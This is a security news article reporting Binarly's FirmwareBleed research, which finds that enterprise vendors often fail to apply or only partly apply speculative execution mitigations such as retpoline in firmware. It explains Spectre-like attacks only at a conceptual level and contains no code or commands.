New Study Finds Most Enterprise Vendors Failing to Mitigate Speculative Execution Attacks
With speculative execution attacks remaining a stubbornly persistent vulnerability ailing modern processors, new research has highlighted an "industry failure" to adopt mitigations released by AMD and Intel, posing a firmware supply chain threat.
Dubbed FirmwareBleed by Binarly, the information leaking assaults stem from the continued exposure of microarchitectural attack surfaces on the part of enterprise vendors either as a result of not correctly incorporating the fixes or only using them partially.
"The impact of such attacks is focused on disclosing the content from privileged memory (including protected by virtualization technologies) to obtain sensitive data from processes running on the same processor (CPU)," the firmware protection firm said in a report shared with The Hacker News.
"Cloud environments can have a greater impact when a physical server can be shared by multiple users or legal entities."
In recent years, implementations of speculative execution, an optimization technique that predicts the outcome and target of branch instructions in a program's execution pipeline, have been deemed susceptible to Spectre-like attacks on processor architectures, potentially enabling a threat actor to leak cryptographic keys and other secrets.
This works by tricking the CPU into executing an instruction that accesses sensitive data in memory that would normally be off-limits to an unprivileged application and then extracting the data after the operation is undone following a misprediction.
A key countermeasure to prevent the harmful effects of speculative execution is a software defense known as retpoline (aka "Return Trampoline"), which was introduced in 2018.
Although recent findings such as Retbleed have conclusively shown that retpoline by itself is insufficient against stopping such attacks in certain scenarios, the latest analysis shows a lack of consistency in even applying these mitigations in the first place.
"Our FirmwareBleed research shows that industry adoption can be quite low and mitigations do not always apply even if they are technically available," Alex Matrosov, CEO and co-founder of Binarly, told The Hacker News.